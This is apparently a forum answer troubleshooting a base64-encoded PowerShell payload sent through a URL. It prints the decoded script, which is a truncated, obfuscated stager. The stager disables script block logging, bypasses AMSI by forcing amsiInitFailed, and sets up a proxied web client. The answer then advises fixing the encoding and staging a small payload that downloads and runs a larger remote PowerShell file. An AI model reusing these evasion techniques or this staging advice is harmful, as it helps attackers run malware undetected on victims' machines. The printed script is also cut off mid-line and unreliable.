Looks like the error what your console is throwing is correct . If you decode your base 64 string you get a powershell script like this
IF($PSVeRsiOnTABlE.PSVeRsIon.MAjor -GE 3){
$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VaL}ElsE{[ScriPTBLOCK]."GeTFie`Ld"('signatures','N'+'onPublic,Static').SeTVALuE($NUlL,(NEw-OBject ColLECtions.GEnERIC.HAshSEt[string]))}[Ref].ASsEMbLY.GetTyPe('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFIelD('amsiInitFailed','NonPublic,Static').SEtVAlUe($NulL,$tRuE)
$u='Mozilla/5.0 (Windows NT 6.1;
rv:11.0) like Gecko';
$wc.PrOXy.CRedentiaLS = [SYSTeM.NEt.CredEnTialCacHe]::DefaUlTNetworKCredEntialS;
$Script:Proxy = $wc.Proxy;
$K=[SysTem.TeXT.ENCoDing]::ASCII.GeTBYtes('</q9X4v.I38l[u{0:}a@@p@ @@@@ p0@0 PP PPP@@@0@@@P@0P@P P`@0@@0@@0@@0@@@P@@P P`@@@0@P P`@0@@0@@0@@0@@ @0@0@@0@P P`@0P p@@ `p@@p@pP@p@p0P@P 0@@ 0P 0P00p@p`@ 0 ` p0`0 @@@@p0@p@@@@0P @@@`@@@0@@@@@@@@@@Pp@0 `@ @@@@`@P
As you can see in last line , the powershell interpreter will not process is as it looks like truncated as it iss missing ')
. You need to investigate as to why your b64 string is incomplete.
Another Point: Even if i assume that the b64 is correct, the length of your URL will exceed 2,083 characters (currently its 4810 chars and still the payload is truncated) What i would suggest is small payload that will download the larger powershell file (from some arbitrary location) and run it directly. But as far as i know, this limitation wont happen is you are using curl , only if you are using browsers (chrome,firefox,ie etc..)
EDIT 1: AlsoAlso, Try and use get encoded bytes like this
$K = [System.Text.Encoding]::ASCII.GetBytes([Convert]::FromBase64String('<==base64payload here==>'))
That way you can be sure that no special character has terminated your string unexpectedly.